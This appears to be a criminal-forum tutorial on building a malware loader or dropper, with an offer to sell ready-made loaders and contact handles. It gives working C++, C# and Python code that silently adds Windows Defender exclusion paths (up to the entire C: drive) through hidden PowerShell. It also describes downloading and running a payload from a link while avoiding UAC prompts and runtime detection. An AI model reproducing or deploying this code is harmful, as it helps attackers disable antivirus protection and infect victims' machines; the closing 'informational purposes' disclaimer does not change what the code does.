In this article I will simply insert code snippets that will help you write your own loader without any problems.
How will it work?
You launch your loader/dropper, it does not disable Windows Defender, because a corresponding notification will appear, but adds the path to the exception, where you then write your executable file and run it from there.
What is the sequence of actions performed by the loader ?
- First function: creating a folder using some simple path (for example, %appdata%/XSSfolder).
- Second function: executing the AddExclusion function, indicating the path just created (I will attach the AddExclusion function snippet below).
- Downloading/dropping your executable to the path you created and added to the exception.
Below is an example of the AddExclusion function in three languages: C++, C#, Python. The function accepts a string with a path, for example: C://Program Files//Program
Technical nuances
- Administrator rights are required, because in the examples powershell is called as administrator, without which it is impossible to add the path to the exception.
- Runtime detections will be distributed to RunPE loaders/droppers. If you encrypt your .exe file using the RunPE method, then running it along the path added to the exception will detect it. You need to run the .exe strictly from this path.
If you need a ready-made source code for a loader/dropper, then please write to us about your desire to purchase a loader/dropper, we will quickly implement a ready-made version with source code and a convenient builder. [Email or TOX]
#include <iostream>
#include <Windows.h>
C++
void addExclusion(const std::wstring& path) {
std::wstring powerShellScript = L"Add-MpPreference -ExclusionPath '" + path + L"'";
STARTUPINFO si = { sizeof(STARTUPINFO) };
PROCESS_INFORMATION pi;
CreateProcess( NULL, (LPWSTR)L"powershell.exe", NULL, NULL, TRUE, 0, NULL, NULL, &si, &pi );
HANDLE hStdIn = GetStdHandle(STD_INPUT_HANDLE);
DWORD bytesWritten;
WriteFile(hStdIn, powerShellScript.c_str(), powerShellScript.size() * sizeof(wchar_t), &bytesWritten, NULL);
CloseHandle(pi.hProcess);
CloseHandle(pi.hThread);
}
C#
using System;
using System.Diagnostics;
public static class WinDefExclusion
{
public static void AddExclusion(string path)
{
string powerShellScript = @$"Add-MpPreference -ExclusionPath '{path}'";
Process process = new Process();
ProcessStartInfo startInfo = new ProcessStartInfo()
{
FileName = "powershell.exe",
RedirectStandardInput = true,
RedirectStandardOutput = true,
UseShellExecute = false,
CreateNoWindow = true,
Verb = "runas"
};
process.StartInfo = startInfo;
process.Start();
process.StandardInput.WriteLine(powerShellScript);
process.StandardInput.Flush();
process.StandardInput.Close();
process.WaitForExit();
process.Close();
}
}
Python
import subprocess
def add_exclusion(path):
power_shell_script = f"Add-MpPreference -ExclusionPath '{path}'"
process = subprocess.Popen(["powershell.exe"], stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
stdout, stderr = process.communicate(input=power_shell_script.encode())
process.wait()
Below is a dropper in C# (net4.0), so you can test it right out of the box. To compile the sources you will need Visual Studio 2019. The link to your file must be specified in Program.cs on line 15; For example, I put a link to the 7-zip installer there
What can he do at the moment ?
Add the entire C:/ drive to Windows Defender exceptions (adding to exceptions is better than disabling it entirely, because when disabled, a million notifications appear and a call to enable the service) Download from the link and run your build without a UAC window or other warnings.
THE NOTE This article is for informational purposes only. We do not encourage you to commit any hacking. Everything you do is your responsibility.
TOX : 340EF1DCEEC5B395B9B45963F945C00238ADDEAC87C117F64F46206911474C61981D96420B72
Telegram : @DevSecAS
You might also like
More from DROPPER
XLL DROPPER
XLL DROPPER | Learn to create Native xll Dropper Write XLL Dropper in c++ , a red teams most used dropper …